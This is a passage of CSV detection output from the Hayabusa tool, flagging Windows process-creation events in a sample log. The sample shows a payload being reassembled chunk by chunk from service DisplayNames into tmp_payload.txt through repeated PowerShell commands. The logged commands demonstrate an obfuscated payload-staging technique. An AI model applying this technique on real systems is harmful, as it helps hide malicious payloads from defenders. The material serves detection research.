2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
